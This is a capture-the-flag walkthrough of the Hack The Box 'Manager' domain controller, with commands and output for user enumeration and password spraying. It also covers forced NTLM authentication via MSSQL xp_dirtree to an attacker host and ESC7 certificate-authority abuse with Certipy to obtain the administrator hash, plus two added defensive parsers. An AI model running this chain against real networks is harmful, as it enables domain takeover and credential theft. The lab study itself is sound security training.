Manager
Recon
DNS (53)
└─$ dig ANY manager.htb @10.129.251.108 +tcp | grep -vE ';|^$'
manager.htb. 600 IN A 10.129.251.108
manager.htb. 600 IN A 10.10.11.236
manager.htb. 3600 IN NS dc01.manager.htb.
manager.htb. 3600 IN SOA dc01.manager.htb. hostmaster.manager.htb. 247 900 600 86400 3600
dc01.manager.htb. 3600 IN A 10.129.251.108
HTTP (80)

The site serves static HTML; no subdomain was found with ffuf.
└─$ domain='manager.htb'; ffuf -k -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -fl 507
SMB
└─$ netexec smb manager.htb -u '' -p '' --shares
SMB 10.129.251.108 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.251.108 445 DC01 [+] manager.htb\:
SMB 10.129.251.108 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
└─$ netexec smb manager.htb -u 'anonymous' -p '' --shares
SMB 10.129.251.108 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.251.108 445 DC01 [+] manager.htb\anonymous:
SMB 10.129.251.108 445 DC01 [*] Enumerated shares
SMB 10.129.251.108 445 DC01 Share Permissions Remark
SMB 10.129.251.108 445 DC01 ----- ----------- ------
SMB 10.129.251.108 445 DC01 ADMIN$ Remote Admin
SMB 10.129.251.108 445 DC01 C$ Default share
SMB 10.129.251.108 445 DC01 IPC$ READ Remote IPC
SMB 10.129.251.108 445 DC01 NETLOGON Logon server share
SMB 10.129.251.108 445 DC01 SYSVOL Logon server share
└─$ netexec smb manager.htb -u 'anonymous' -p '' --rid-brute | tee users_rid.log
SMB 10.129.251.108 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.251.108 445 DC01 [+] manager.htb\anonymous:
SMB 10.129.251.108 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.251.108 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.129.251.108 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.129.251.108 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.129.251.108 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.129.251.108 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.129.251.108 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.129.251.108 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.129.251.108 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.129.251.108 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.129.251.108 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.129.251.108 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.129.251.108 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.251.108 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.251.108 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.251.108 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.129.251.108 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.129.251.108 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.251.108 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.251.108 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.251.108 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.251.108 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.129.251.108 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.129.251.108 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.251.108 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.129.251.108 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.129.251.108 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.129.251.108 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.129.251.108 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.129.251.108 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.129.251.108 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.129.251.108 445 DC01 1119: MANAGER\Operator (SidTypeUser)
└─$ grep SidTypeUser users_rid.log | awk '{split($6, a, "\\"); print(a[2])}' | tee users.txt
Administrator
Guest
krbtgt
DC01$
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator
Try each username as its own password (append lowercase copies of the names first)
└─$ tr 'A-Z' 'a-z' < users.txt > users_lower.txt; cat users_lower.txt >> users.txt
└─$ netexec smb manager.htb -u users.txt -p users.txt --no-bruteforce
SMB 10.129.251.108 445 DC01 [+] manager.htb\operator:operator
Enumerate DC
└─$ faketime -f +7h cicada-mastertul -t '10.129.251.108' -u 'operator' -p 'operator' -d 'manager.htb'
[!x!] Scanning 10.129.251.108
[!] Enumerating SMB...
netexec smb 10.129.251.108 -u 'operator' -p 'operator' --shares
[-] Could not connect to SMB
[!] Connecting to WinRM...
netexec winrm 10.129.251.108 -u 'operator' -p 'operator'
[-] Could not connect to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/woyag/Desktop/Rooms/Manager/mastertul/10.129.251.108/ldap_results
[!x!] Cleaning up...

Raven can WinRM into the machine, so that account is our target.
MSSQL
BloodHound showed no outbound permissions, but we have access to MSSQL.
└─$ netexec mssql 10.129.251.108 -u 'operator' -p 'operator'
MSSQL 10.129.251.108 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.129.251.108 1433 DC01 [+] manager.htb\operator:operator
Command execution is disabled
└─$ netexec mssql 10.129.251.108 -u 'operator' -p 'operator' -M mssql_priv -o ACTION=privesc
MSSQL 10.129.251.108 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.129.251.108 1433 DC01 [+] manager.htb\operator:operator
MSSQL_PRIV 10.129.251.108 1433 DC01 [+] MANAGER\Operator is sysadmin
MSSQL_PRIV 10.129.251.108 1433 DC01 [+] MANAGER\Operator is now a sysadmin! (Pwn3d!)
└─$ netexec mssql 10.129.251.108 -u 'operator' -p 'operator' -x whoami
MSSQL 10.129.251.108 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.129.251.108 1433 DC01 [+] manager.htb\operator:operator
The hash caught by Responder belongs to the machine account DC01$, so it is not crackable.
└─$ sudo responder -I tun0
---
└─$ impacket-mssqlclient 'MANAGER.HTB'/'operator':'operator'@'10.129.251.108' -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
SQL (MANAGER\Operator guest@master)> xp_dirtree \\10.10.14.113\x
...
[SMB] NTLMv2-SSP Client : 10.129.251.108
[SMB] NTLMv2-SSP Username : MANAGER\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::MANAGER:1298c7446bb71623:7E834EEFE336C155DB7EE552CBE76A41:010100000000000000DB934E5E48DB01AA71E8B1321E2B79000000000200080048004A005400560001001E00570049004E002D004100560045005600520034005900450056005000480004003400570049004E002D00410056004500560052003400590045005600500048002E0048004A00540056002E004C004F00430041004C000300140048004A00540056002E004C004F00430041004C000500140048004A00540056002E004C004F00430041004C000700080000DB934E5E48DB0106000400020000000800300030000000000000000000000000300000D167A1BC4215133E40EB79E0D32D161C6C1A5048EBEB9A1A819856EC8041ACCA0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310033000000000000000000
[+] Exiting...
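A closer look at that captured line, as an added example (not part of the writeup or of Responder): the parser below decodes the NTLMv2 response blob to recover the account, the timestamp and the MsvAvTargetName SPN, which tells an incident responder which host the DC was coerced to authenticate to. The hash line is the one printed above; the AV_PAIR ids follow MS-NLMP.

```python
import struct
from datetime import datetime, timedelta, timezone

# The NTLMv2-SSP line exactly as Responder printed it above (page data, not constructed).
HASH_LINE = "DC01$::MANAGER:1298c7446bb71623:7E834EEFE336C155DB7EE552CBE76A41:010100000000000000DB934E5E48DB01AA71E8B1321E2B79000000000200080048004A005400560001001E00570049004E002D004100560045005600520034005900450056005000480004003400570049004E002D00410056004500560052003400590045005600500048002E0048004A00540056002E004C004F00430041004C000300140048004A00540056002E004C004F00430041004C000500140048004A00540056002E004C004F00430041004C000700080000DB934E5E48DB0106000400020000000800300030000000000000000000000000300000D167A1BC4215133E40EB79E0D32D161C6C1A5048EBEB9A1A819856EC8041ACCA0A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310033000000000000000000"

# AV_PAIR ids (MS-NLMP 2.2.2.1): the server puts these in its CHALLENGE and the
# client echoes them inside the NTLMv2 response it computes.
AV_IDS = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
          4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
          8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_utc(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01) -> aware UTC datetime."""
    return EPOCH_1601 + timedelta(microseconds=ft // 10)

def parse_ntlmv2(line):
    """Decode who authenticated, when, and to which SPN from a Responder hash line."""
    user, _, domain, server_chal, nt_proof, blob_hex = line.split(":", 5)
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE: type(1) hitype(1) reserved(6) time(8) chal(8) reserved(4)
    filetime, client_chal = struct.unpack_from("<8xQ8s4x", blob, 0)
    av, pos = {}, 28
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:                      # MsvAvEOL ends the list
            break
        value, pos = blob[pos:pos + av_len], pos + av_len
        name = AV_IDS.get(av_id, f"Av{av_id}")
        if av_id in (1, 2, 3, 4, 5, 9):     # UTF-16LE strings
            av[name] = value.decode("utf-16-le")
        elif av_id == 7:
            av[name] = filetime_to_utc(struct.unpack("<Q", value)[0])
        else:
            av[name] = value.hex()
    return {"user": user, "domain": domain, "nt_proof": nt_proof,
            # A trailing '$' marks a machine account: its password is a random
            # 120-character secret rotated automatically, so cracking it is futile.
            "is_machine_account": user.endswith("$"),
            "timestamp": filetime_to_utc(filetime),
            "server_challenge": server_chal, "client_challenge": client_chal.hex(),
            "av": av}
```

The WIN-<11 characters> and <4 letters>.LOCAL names in the AV pairs are Responder's randomly generated identity, not anything from the domain; TargetName is the value worth keeping for the incident timeline.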
netexec made us sysadmin, but we still have no permission to enable xp_cmdshell.
SQL (MANAGER\Operator guest@master)> enable_xp_cmdshell
ERROR(DC01\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC01\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
Enumerate with xp_dirtree
SQL (MANAGER\Operator guest@master)> xp_dirtree \inetpub\wwwroot
[%] exec master.sys.xp_dirtree '\inetpub\wwwroot',1,1
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
The backup file is served by the web server, so we can download it.
└─$ curl -LOs 'http://10.129.251.108/website-backup-27-07-23-old.zip'
└─$ unzip website-backup-27-07-23-old.zip -d backup

Creds:
raven:R4v3nBe5tD3veloP3r!123
WinRM
└─$ evil-winrm -i manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
*Evil-WinRM* PS C:\Users\Raven\Documents> whoami /all
User Name SID
============= ==============================================
manager\raven S-1-5-21-4078382237-1492182817-2568127209-1116
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
User.txt
*Evil-WinRM* PS C:\Users\Raven\Documents> cat ../Desktop/user.txt
00ea5f4486bf2455ff7c7f0a69cd3308
Privilege Escalation
BloodHound still shows nothing useful.
└─$ faketime -f +7h bloodhound-python -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -d 'manager.htb' -c All -ns 10.129.251.108 -dc dc01.manager.htb --zip -op raven

Enumerate the CA and certificate templates on the DC.
└─$ certipy-ad find -vulnerable -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
https://github.com/ly4k/Certipy?tab=readme-ov-file#esc7
https://www.thehacker.recipes/ad/movement/adcs/access-controls#certificate-authority-esc7
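As an added example (not part of the writeup or of Certipy), a check a defender can run over a Certipy listing like the one above to catch the ESC7 condition: parse the CA's Access Rights and report any principal outside the built-in admin groups that holds ManageCa or ManageCertificates. The sample text is the page's own Permissions block re-indented as Certipy prints it; the trusted-group list is an assumption.

```python
import re

# Assumption: the groups expected to manage a CA; extend with any PKI-admin group you use.
TRUSTED_MANAGERS = {"Administrators", "Domain Admins", "Enterprise Admins"}
DANGEROUS_RIGHTS = {"ManageCa", "ManageCertificates"}

# Constructed sample: the Permissions block from the certipy-ad output above, re-indented.
CERTIPY_OUTPUT = """\
    CA Name                             : manager-DC01-CA
    Permissions
      Owner                             : MANAGER.HTB\\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\\Operator
                                          MANAGER.HTB\\Authenticated Users
                                          MANAGER.HTB\\Raven
        ManageCertificates              : MANAGER.HTB\\Administrators
        ManageCa                        : MANAGER.HTB\\Administrators
                                          MANAGER.HTB\\Domain Admins
                                          MANAGER.HTB\\Enterprise Admins
                                          MANAGER.HTB\\Raven
"""
RIGHT_RE = re.compile(r"(Enroll|ManageCa|ManageCertificates)\s*:\s*(.+)")
CONT_RE = re.compile(r"[^:]+\\[^:]+")          # bare DOMAIN\principal continuation line

def parse_access_rights(text):
    """Return {ca_name: {right: [principal, ...]}} from Certipy's CA listing."""
    cas, ca, right = {}, None, None
    for line in text.splitlines():
        s = line.strip()
        if (m := re.match(r"CA Name\s*:\s*(.+)", s)):
            ca, right = m.group(1), None
            cas[ca] = {}
        elif ca and (m := RIGHT_RE.match(s)):
            right = m.group(1)
            cas[ca][right] = [m.group(2)]
        elif right and CONT_RE.fullmatch(s):   # more principals for the same right
            cas[ca][right].append(s)
        else:
            right = None                        # any other line ends the list
    return cas

def esc7_findings(text):
    """(ca, right, principal) for every non-admin principal that can manage the CA."""
    return [(ca, right, p)
            for ca, rights in parse_access_rights(text).items()
            for right in sorted(rights.keys() & DANGEROUS_RIGHTS)
            for p in rights[right]
            if p.split("\\", 1)[-1] not in TRUSTED_MANAGERS]
```

Run it against the output of `certipy-ad find -stdout` (without -vulnerable) on a schedule: Certipy only flags ESC7 for the account it runs as, whereas this lists every unexpected manager.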
└─$ USER='raven'
PASSWORD='R4v3nBe5tD3veloP3r!123'
DOMAIN='manager.htb'
CA='manager-DC01-CA'
└─$ certipy-ad ca -ca "$CA" -add-officer "$USER" -username "$USER@$DOMAIN" -password "$PASSWORD"
certipy-ad ca -ca "$CA" -enable-template "SubCA" -username "$USER@$DOMAIN" -password "$PASSWORD"
certipy-ad req -username "$USER@$DOMAIN" -password "$PASSWORD" -ca "$CA" -target "$DOMAIN" -template "SubCA" -upn "administrator@$DOMAIN"
certipy-ad ca -ca "$CA" -issue-request 21 -username "$USER@$DOMAIN" -password "$PASSWORD"
certipy-ad req -username "$USER@$DOMAIN" -password "$PASSWORD" -ca "$CA" -target "$DOMAIN" -retrieve 21
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 21
Would you like to save the private key? (y/N) y
[*] Saved private key to 21.key
[-] Failed to request certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 21
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '21.key'
[*] Saved certificate and private key to 'administrator.pfx'
Get the NTLM hash for Administrator; the clock skew has to be fixed first.
└─$ certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
└─$ sudo ntpdate manager.htb
2024-12-07 11:56:44.712756 (-0500) +25198.083861 +/- 0.040104 manager.htb 10.129.251.108 s1 no-leap
CLOCK: time stepped by 25198.083861
└─$ echo $(( 25198.083861 / 3600 ))
6.9994677391666666
└─$ faketime -f +7h certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
Root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
57e674457bce72947459f144c4987aa3